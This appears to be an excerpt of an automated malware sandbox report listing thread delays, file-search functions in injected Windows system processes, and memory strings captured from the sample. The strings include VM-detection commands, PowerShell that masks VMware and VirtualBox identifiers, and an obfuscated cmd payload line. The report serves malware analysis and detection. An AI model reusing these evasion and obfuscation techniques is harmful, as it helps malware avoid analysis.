Source: C:\Windows\System32\winlogon.exe TID: 7716 | Thread sleep count: 1953 > 30
Source: C:\Windows\System32\winlogon.exe TID: 7716 | Thread sleep time: -1953000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7728 | Thread sleep count: 7917 > 30
Source: C:\Windows\System32\lsass.exe TID: 7728 | Thread sleep time: -7917000s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7732 | Thread sleep count: 418 > 30
Source: C:\Windows\System32\lsass.exe TID: 7732 | Thread sleep time: -41800s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 7728 | Thread sleep count: 864 > 30
Source: C:\Windows\System32\lsass.exe TID: 7728 | Thread sleep time: -864000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7740 | Thread sleep count: 5377 > 30
Source: C:\Windows\System32\svchost.exe TID: 7740 | Thread sleep time: -5377000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7744 | Thread sleep count: 1478 > 30
Source: C:\Windows\System32\svchost.exe TID: 7744 | Thread sleep time: -147800s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 8072 | Thread sleep count: 8786 > 30
Source: C:\Windows\System32\dwm.exe TID: 8072 | Thread sleep time: -8786000s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 8076 | Thread sleep count: 389 > 30
Source: C:\Windows\System32\dwm.exe TID: 8076 | Thread sleep time: -38900s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 4304 | Thread sleep time: -142700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2872 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2992 | Thread sleep count: 174 > 30
Source: C:\Windows\System32\svchost.exe TID: 2992 | Thread sleep time: -174000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2908 | Thread sleep count: 1333 > 30
Source: C:\Windows\System32\svchost.exe TID: 2908 | Thread sleep time: -133300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8084 | Thread sleep count: 53 > 30
Source: C:\Windows\System32\svchost.exe TID: 8084 | Thread sleep time: -53000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8088 | Thread sleep count: 1301 > 30
Source: C:\Windows\System32\svchost.exe TID: 8088 | Thread sleep time: -130100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8100 | Thread sleep count: 34 > 30
Source: C:\Windows\System32\svchost.exe TID: 8100 | Thread sleep time: -34000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104 | Thread sleep count: 1273 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104 | Thread sleep time: -127300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8112 | Thread sleep count: 149 > 30
Source: C:\Windows\System32\svchost.exe TID: 8112 | Thread sleep time: -149000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8116 | Thread sleep count: 1321 > 30
Source: C:\Windows\System32\svchost.exe TID: 8116 | Thread sleep time: -132100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8124 | Thread sleep count: 152 > 30
Source: C:\Windows\System32\svchost.exe TID: 8124 | Thread sleep time: -152000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8128 | Thread sleep count: 1409 > 30
Source: C:\Windows\System32\svchost.exe TID: 8128 | Thread sleep time: -140900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8136 | Thread sleep count: 161 > 30
Source: C:\Windows\System32\svchost.exe TID: 8136 | Thread sleep time: -161000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8140 | Thread sleep count: 1409 > 30
Source: C:\Windows\System32\svchost.exe TID: 8140 | Thread sleep time: -140900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8148 | Thread sleep count: 159 > 30
Source: C:\Windows\System32\svchost.exe TID: 8148 | Thread sleep time: -159000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8152 | Thread sleep count: 1379 > 30
Source: C:\Windows\System32\svchost.exe TID: 8152 | Thread sleep time: -137900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7364 | Thread sleep count: 164 > 30
Source: C:\Windows\System32\svchost.exe TID: 7364 | Thread sleep time: -164000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7308 | Thread sleep count: 1377 > 30
Source: C:\Windows\System32\svchost.exe TID: 7308 | Thread sleep time: -137700s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288 | Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7324 | Thread sleep count: 175 > 30
Source: C:\Windows\System32\svchost.exe TID: 7324 | Thread sleep time: -175000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7320 | Thread sleep count: 1349 > 30
Source: C:\Windows\System32\svchost.exe TID: 7320 | Thread sleep time: -134900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2980 | Thread sleep count: 175 > 30
Source: C:\Windows\System32\svchost.exe TID: 2980 | Thread sleep time: -175000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3232 | Thread sleep count: 1343 > 30
Source: C:\Windows\System32\svchost.exe TID: 3232 | Thread sleep time: -134300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7424 | Thread sleep count: 177 > 30
Source: C:\Windows\System32\svchost.exe TID: 7424 | Thread sleep time: -177000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3452 | Thread sleep count: 1341 > 30
Source: C:\Windows\System32\svchost.exe TID: 3452 | Thread sleep time: -134100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7432 | Thread sleep count: 178 > 30
Source: C:\Windows\System32\svchost.exe TID: 7432 | Thread sleep time: -178000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7448 | Thread sleep count: 1332 > 30
Source: C:\Windows\System32\svchost.exe TID: 7448 | Thread sleep time: -133200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7412 | Thread sleep count: 181 > 30
Source: C:\Windows\System32\svchost.exe TID: 7412 | Thread sleep time: -181000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6676 | Thread sleep count: 1355 > 30
Source: C:\Windows\System32\svchost.exe TID: 6676 | Thread sleep time: -135500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 564 | Thread sleep count: 176 > 30
Source: C:\Windows\System32\svchost.exe TID: 564 | Thread sleep time: -176000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2620 | Thread sleep count: 1347 > 30
Source: C:\Windows\System32\svchost.exe TID: 2620 | Thread sleep time: -134700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7252 | Thread sleep count: 180 > 30
Source: C:\Windows\System32\svchost.exe TID: 7252 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7236 | Thread sleep count: 1347 > 30
Source: C:\Windows\System32\svchost.exe TID: 7236 | Thread sleep time: -134700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1652 | Thread sleep count: 1345 > 30
Source: C:\Windows\System32\svchost.exe TID: 1652 | Thread sleep time: -134500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6496 | Thread sleep count: 171 > 30
Source: C:\Windows\System32\svchost.exe TID: 6496 | Thread sleep time: -171000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1876 | Thread sleep count: 170 > 30
Source: C:\Windows\System32\svchost.exe TID: 1876 | Thread sleep time: -170000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1180 | Thread sleep count: 1313 > 30
Source: C:\Windows\System32\svchost.exe TID: 1180 | Thread sleep time: -131300s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 2936 | Thread sleep count: 388 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2936 | Thread sleep time: -38800s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7488 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3824 | Thread sleep count: 190 > 30
Source: C:\Windows\System32\svchost.exe TID: 3824 | Thread sleep time: -190000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1316 | Thread sleep count: 1266 > 30
Source: C:\Windows\System32\svchost.exe TID: 1316 | Thread sleep time: -126600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1848 | Thread sleep count: 192 > 30
Source: C:\Windows\System32\svchost.exe TID: 1848 | Thread sleep time: -192000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2040 | Thread sleep count: 1357 > 30
Source: C:\Windows\System32\svchost.exe TID: 2040 | Thread sleep time: -135700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1860 | Thread sleep count: 183 > 30
Source: C:\Windows\System32\svchost.exe TID: 1860 | Thread sleep time: -183000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1840 | Thread sleep count: 1248 > 30
Source: C:\Windows\System32\svchost.exe TID: 1840 | Thread sleep time: -124800s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\lsass.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe | Last function: Thread delayed
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1EDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1ED894 FindFirstFileExW,15_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D21DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D21D894 FindFirstFileExW,15_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D29DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D29D894 FindFirstFileExW,15_2_000001CA7D29D894
Source: C:\Windows\System32\lsass.exe | Code function: 16_2_0000017D2DD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe | Code function: 16_2_0000017D2DD5D894 FindFirstFileExW,16_2_0000017D2DD5D894
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000022F4B92DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_0000022F4B92D894 FindFirstFileExW,17_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1CADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1CADA18
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1CAD894 FindFirstFileExW,18_2_00000262F1CAD894
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D0DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D0D894 FindFirstFileExW,18_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_00000262F1D3DA18
Source: C:\Windows\System32\dwm.exe | Code function: 18_2_00000262F1D3D894 FindFirstFileExW,18_2_00000262F1D3D894
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD2DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001B68BD2DA18
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD2D894 FindFirstFileExW,22_2_000001B68BD2D894
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD5DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001B68BD5DA18
Source: C:\Windows\System32\cmd.exe | Code function: 22_2_000001B68BD5D894 FindFirstFileExW,22_2_000001B68BD5D894
Source: C:\Windows\System32\conhost.exe | Code function: 23_2_000001E591CCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_000001E591CCDA18
Source: C:\Windows\System32\conhost.exe | Code function: 23_2_000001E591CCD894 FindFirstFileExW,23_2_000001E591CCD894
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E13D894 FindFirstFileExW,26_2_000002234E13D894
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E13DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E16D894 FindFirstFileExW,26_2_000002234E16D894
Source: C:\Windows\System32\svchost.exe | Code function: 26_2_000002234E16DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000023942B1DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_0000023942B1D894 FindFirstFileExW,27_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF056DD894 FindFirstFileExW,28_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF056DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF0570D894 FindFirstFileExW,28_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe | Code function: 28_2_000001EF0570DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,28_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002287AD4D894 FindFirstFileExW,29_2_000002287AD4D894
Source: C:\Windows\System32\svchost.exe | Code function: 29_2_000002287AD4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,29_2_000002287AD4DA18
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001B94DA9D894 FindFirstFileExW,30_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exe | Code function: 30_2_000001B94DA9DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,30_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_000002520257DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_000002520257DA18
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_000002520257D894 FindFirstFileExW,31_2_000002520257D894
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_00000252025ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exe | Code function: 31_2_00000252025AD894 FindFirstFileExW,31_2_00000252025AD894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EBFCD894 FindFirstFileExW,32_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC68D894 FindFirstFileExW,32_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC68DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6BD894 FindFirstFileExW,32_2_000001A9EC6BD894
Source: C:\Windows\System32\svchost.exe | Code function: 32_2_000001A9EC6BDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,32_2_000001A9EC6BDA18
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF163DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF163DA18
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF163D894 FindFirstFileExW,33_2_0000019FF163D894
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,33_2_0000019FF19ADA18
Source: C:\Windows\System32\svchost.exe | Code function: 33_2_0000019FF19AD894 FindFirstFileExW,33_2_0000019FF19AD894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe | Thread delayed: delay time: 922337203685477
Source: svchost.exe, 00000024.00000002.3344567466.000002A769A42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000000.1543220583.000002A769A42000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: @Microsoft-Windows-Hyper-V-Hypervisor
Source: svchost.exe, 00000024.00000000.1543220583.000002A769A42000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: (@vmci
Source: cmd.exe, 00000016.00000003.1482211032.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: VMware SATA CD00
Source: svchost.exe, 0000001D.00000002.3347854568.000002287A02B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: NECVMWarVMware SATA CD00
Source: cmd.exe, 00000016.00000003.1484014593.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484369314.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482211032.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1487300764.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1486881918.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484505880.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483753694.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1485499049.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1462971364.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483317075.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482696640.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.36.dr | Binary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dcPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: dRomNECVMWarVMware_SATA_
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 0000001A.00000002.3406455326.000002234AE79000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000024.00000000.1543789153.000002A76A110000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.36.dr | Binary or memory string: VMwareVirtual disk2.06000c298128b8c02a71a2474aeb5f3dcPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.dr | Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.36.dr | Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: LSI_SASVMware Virtual disk 6000c298128b8c02a71a2474aeb5f3dc
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.36.dr | Binary or memory string: VMCI: Using capabilities (0x1c).
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
Source: cmd.exe, 00000016.00000003.1523180983.000001B68B796000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ht%t%BxeirvhizTcyfRjSrTWsOGhCJHQOioSVlhyeAkxdxDSpSPiBMZNbBP%o%EUpCzKFsZkbhmYsfrgwTUlOSKTyocjBQtwCDPYLMyeDHnKCkiHHGFI%h%UtgwRFmqqQJkOPvPptuJvQHgEarnfuCUkKCjwshgAhONYdVNPtrolW%K%ndMZRRoYkVoOadmmsXloinbTiBeDyMdnIoxyxxBqSCXTzkcSACaucX%R%OacSRqNKAySafMGOPVwVwFpiuXyldVLJkLzxwEFlDhcybzeqmMNfYh%n%AiKUyTRBGFNiPumirkplsoDRgVTiZrhFKdkrMBgMtbBxLSJJeduDQN%Y%OlFSNCaIBoxhyLjVwPdDRqNggoljeWXEPXpZLTODLKAmZDuXAiHEzn%D%WyyyMyrQEFqSsAwkjCbzRgQAhCUoJVotfCbRAnhpmUgUWgkTAqYeCZ%O%vQHYrjEchJqXNQzFJWvLnWZVEasaNsWjQggljCVXLkMxDYsuuVGcJQ%t%MyQLtqRDpOMggHKnwhayacjCsFHXFSMTAauHvxiFfhVYKwRLKhyzcl%e%PJontOJTXwcSGgncSYYvtThlSVOVnytnRpkLsheuVljyVRQLyHoAAH%G%SWBdvxZNFzcPbrWBJKUDzhJJqafdxGjTMjwnkpMGuiFKvgQyOWYEGW%n%iKmRNusWpZpjcSUIrtXnjrCZnjkGoAHFnPbMbsCsnxSFumdXDfEEHs%l%NQhmEDkMIPrKWnRiHZRFaLzXFbgmciWdYUbkEOOYiBPdnKqPgvyFMb%F%scrkHCwXJzSoMblGDTlSxyVwJUKqgGKqqWCZTuglBkRpkZYpEASEuU%E%ETgVAMSgQcPBXPzlNjNZqmGGlKWvLGOfWwrITXTttvtOzIbiPsMIRu%t%DsnzJPQwuknKFByQsPptGVSRgDJOFsTgnCSYvtodDWajAPdzKZaWty%l%NIAvtfgcQbrhwcIzvYBmQJUIqqAjeGsWMPPkyZaiXAgZRttbRkDcvh%=o%dNRecFWYkJuuGmxbvXtopDVRXXzsTdpBFhLwGVYCaCWpxYNOtjhebSrzSagfgEehuTPyB%+%buAZRoNHGtZjLYJVkzNPlEGOTvvxOVDjonsPGfkDESmGhVvGvljubIpwOMgvSpSKQQVxF%4%UofojltsZHXaPcDLjhFXWaUZPLpZBQqZXaAWefRxVeOeiudnpYGIpAJUugyyVuRjqXcOB%Q%GHdqicRlPQuHbJCjHKxqGCYHsBAnFNksoLIrDsgxRIEpeRTKoZJnFxVeJwXGCEFbFcsqb%=%lGpDazYYIDBHPYGeXNRQEHgvzUmcCJbzDJdtuJEYXfbTvZMGZXIpBAwDzTdfmVvYBcefU%=%nKoiTTyGnZAhGcFbMXdnATAFzLbJcstVHMMmugHGXXmUDXGSQXPeaRuukIJhRPDVGFATq%'%sHFqwqCGGcBeiTfCoUPrscLxAPitrnYwMCypjOEBRNDGhcJVysrKLCYpViPHhjoseesGu%)%PtAqnAEyfpxgmUZWnLkEitaYXtIzlCcKcBJYQuxbtQQTrAVoovQthclvtBtUSfnDmNdLl%;%bgToikrDhGwytkQLJCapnFoaDjoDnGExkdnpWeZRTSlUXvzVxRCldvYwRTKYWOqAcYnpX%%APEDivvttdhKtgvdtuPfRydtaVfBLSYijYWcXHUZCcxPDoDHUwJEykfcLkDnqTIBeYBvk%$%tgLzPCObnQLryHoiuJYSUqMeHJJuVLEMixAqXeJIrbyuRVRlutKpDCpdtHSfStfClZjbg%b%XkpapATSsmLRxaCbpjFhxXqmDQXVWiSMQfwivoocwlavhnutD
AWPETJZUcwzCYWjtZbsE%q%tFaVCLmWUfpvErvmciXvwnsROAypRchmbPjUVUbixcZXhdXGAWqReXhgnjgcnWfSXduPi%y%ArigPYtouKLCSOULqieHdHMOYVAXgZdJixaFiKoZNRSyuAvilhHVphfSEthUxwhvHbuuN%"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.dr | Binary or memory string: nonicNECVMWarVMware SATA CD00
